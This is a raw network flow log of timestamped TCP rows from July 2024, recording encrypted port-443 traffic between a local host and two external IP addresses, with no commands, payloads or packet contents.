Jul 24, 2024 19:56:37.862977982 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.862989902 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.863013983 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.863029003 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.863663912 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.863704920 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.863725901 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.863732100 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.863756895 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.863773108 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.864187002 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.864226103 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.864255905 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.864264011 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.864298105 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.864830017 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.864873886 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.864964008 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.864972115 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.865669012 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.865678072 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.865694046 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.865700006 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.865730047 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.865736961 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.865748882 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.865753889 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.865784883 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.865808964 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.869621992 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.949625969 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.949650049 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.949788094 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.949810982 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.951468945 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.955619097 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.955636978 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.955724001 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.955732107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.956353903 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.956373930 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.956420898 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.956428051 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.956439972 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.956485987 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.956808090 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.956821918 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.956871033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.956876993 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.957068920 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.957087040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.957125902 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.957133055 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.957159042 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.957186937 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.958184004 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.958199978 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.958355904 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.958362103 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959100962 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959120035 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959183931 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.959191084 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959364891 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.959381104 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.959680080 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959695101 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959743023 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.959749937 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:37.959788084 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.963957071 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:37.968281031 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.041949987 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.041984081 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.042176008 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.042210102 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.042372942 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.045804977 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.045828104 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.045888901 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.045897961 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.046216011 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.046237946 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.046278000 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.046284914 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.046310902 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.046339989 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.049982071 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.049998999 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050050020 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050055981 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050069094 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050098896 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050321102 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050342083 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050384045 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050390959 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050414085 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050431967 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050549030 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050565004 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.050622940 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.050631046 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.051354885 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.051376104 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.051424980 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.051431894 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.051444054 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.051472902 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.051641941 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.051661968 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.051718950 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.051724911 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.052349091 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.052372932 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.129170895 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.129195929 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.129311085 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.129332066 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.129450083 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.132538080 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.132555008 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.132620096 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.132627010 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.132652998 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.132671118 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.133059025 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.133074999 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.133141041 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.133147001 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.134037971 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.135366917 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.135380983 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.135437965 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.135445118 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.135899067 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.135920048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.135958910 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.135965109 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.135993004 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.136019945 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.137084961 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.137099981 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.137187004 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.137192965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.137535095 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.137619019 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.137634993 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.137706041 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.137712002 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.137954950 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.137967110 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.138150930 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.138164997 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.138216972 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.138223886 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.141575098 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.141803980 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.141824961 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.216305017 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.216366053 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.216511011 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.216543913 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.216557980 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.217518091 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.226022005 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.226068020 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.226104021 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.226110935 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.226140976 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.226156950 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.226753950 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.226797104 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.226829052 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.226835012 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.226860046 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.226881981 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.227302074 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.227340937 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.227366924 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.227374077 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.227423906 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.228019953 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.228063107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.228092909 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.228097916 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.228132963 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.228149891 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.231861115 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.231905937 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.231940985 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.231950045 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.231970072 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.231988907 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.232769966 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.232810020 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.232837915 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.232844114 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.232868910 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.232886076 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.233138084 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.233180046 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.233212948 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.233218908 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.233243942 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.233254910 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.236417055 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.305627108 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.305650949 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.305783033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.305802107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.310139894 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.312916040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.312933922 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.313007116 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.313019037 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.313412905 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.313433886 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.313476086 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.313482046 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.313507080 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.313527107 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.314297915 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.314312935 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.314363956 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.314369917 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.314379930 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.314409971 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.314778090 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.314799070 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.314835072 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.314841032 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.314863920 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.314877033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.318088055 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.318104029 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.318159103 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.318166018 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.318783045 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.318799973 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.318856955 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.318865061 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.319329977 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.319344044 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.319406033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.319413900 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.320158005 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.320203066 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.327493906 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.392676115 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.392698050 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.392765045 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.392779112 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.392848015 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.401246071 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.401262999 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.401344061 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.401350975 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.401386976 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.402004004 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402019978 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402076960 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.402084112 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402657986 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402678013 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402728081 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.402730942 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402744055 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402760983 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.402767897 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402791977 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.402798891 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.402827978 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.405193090 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.405214071 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.405277967 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.405286074 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.405635118 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.405649900 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.405714989 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.405723095 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.406258106 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.406279087 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.406318903 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.406325102 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.406356096 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.409811020 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.414751053 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.434456110 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.434528112 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.437149048 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.437159061 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.437638998 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.437647104 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.437741995 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.442368031 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.442416906 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.445856094 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.445899010 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.446356058 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.446408033 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.446820021 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.446820021 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.446835995 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.446849108 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.447163105 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.447181940 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.447480917 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.447494030 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.447678089 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:38.447688103 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:38.479644060 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.479672909 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.479717970 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.479748011 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.479768038 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.479794025 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.487198114 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.487229109 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.487304926 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.487313986 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488074064 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488095999 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488132954 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.488138914 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488203049 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.488663912 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488681078 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488706112 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.488713026 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.488722086 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.488744020 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.488790989 CEST	49737	443	192.168.2.10	185.149.100.242
